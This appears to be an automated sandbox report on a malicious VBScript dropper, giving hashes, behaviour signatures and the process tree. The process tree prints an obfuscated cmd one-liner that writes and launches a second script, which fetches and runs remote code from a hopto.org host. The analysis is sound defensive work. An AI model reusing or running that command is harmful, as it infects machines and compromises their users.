Analysis

  • max time kernel
    146s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-es
  • submitted
    23-06-2022 14:52

General

  • Target

    27.FICH_33O3LcBJBPsZDE6v.vbs

  • Size

    7KB

  • MD5

    25926cb2b53f3be53b0999621d1f1ccf

  • SHA1

    9a073d7bd4b2f730f157f4612551504d16607256

  • SHA256

    665b376283df9d5e962860cc1d6cc2ec05157afff65d44b6d9ff64d8b6393941

  • SHA512

    8542f4c0815e8f161c4dc2151252454fc2dcc86da0a3160724f54d702d3ea99805be006d5bfdde65f68f3aba6556892d735515824a3fdf24f9de0dd05dc469bd

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\27.FICH_33O3LcBJBPsZDE6v.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4536
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmD ^/V/D/c EcHo function jzYA(VqB4eXG4vnLneHYp9) jzYA= replace(VqB4eXG4vnLneHYp9,"oIf6","w" ): End function: bZgICx10gbdN43 = jzYA("S=cri=pt=:H=ttps://oIf6fux02.hopto.org/g=1="): GetObject(AUrt(bZgICx10gbdN43)): function AUrt(c0zTSkrS20) AUrt= replace(c0zTSkrS20,"=","" ): end function > nul > %Public%\^L8DPGAESQ5.vbs |^start cMd /c start %Public%\^L8DPGAESQ5.vbs
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2216
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" EcHo function jzYA(VqB4eXG4vnLneHYp9) jzYA= replace(VqB4eXG4vnLneHYp9,"oIf6","w" ): End function: bZgICx10gbdN43 = jzYA("S=cri=pt=:H=ttps://oIf6fux02.hopto.org/g=1="): GetObject(AUrt(bZgICx10gbdN43)): function AUrt(c0zTSkrS20) AUrt= replace(c0zTSkrS20,"=","" ): end function 1>C:\Users\Public\L8DPGAESQ5.vbs"
        3⤵
          PID:1700
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" start cMd /c start C:\Users\Public\L8DPGAESQ5.vbs"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3744
          • C:\Windows\system32\cmd.exe
            cMd /c start C:\Users\Public\L8DPGAESQ5.vbs
            4⤵
            • Checks computer location settings
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:1076
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Public\L8DPGAESQ5.vbs"
              5⤵
              • Blocklisted process makes network request
              PID:4336

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Discovery
    • Query Registry (T1012): 1
    • System Information Discovery (T1082): 2


Downloads

  • C:\Users\Public\L8DPGAESQ5.vbs

    Filesize
    275B

    MD5
    6bac93f3f5d256c436d31e9496f33353

    SHA1
    906d675da017b53b3051cca5bf270655d68bc358

    SHA256
    f7c07264ac5931edc61c2bf838cffba41e119d9780876904c1c2d817ce5810c6

    SHA512
    ab576653b6030eec23d241a37805bad26cc13b38a0bf8957bbea0c010fd910e15ceece6fd4bacc784aadc1f8b1ed55c64b93ada35bcdfdb98d16afeb5b7c4804

  • memory/1076-133-0x0000000000000000-mapping.dmp
  • memory/1700-131-0x0000000000000000-mapping.dmp
  • memory/2216-130-0x0000000000000000-mapping.dmp
  • memory/3744-132-0x0000000000000000-mapping.dmp
  • memory/4336-135-0x0000000000000000-mapping.dmp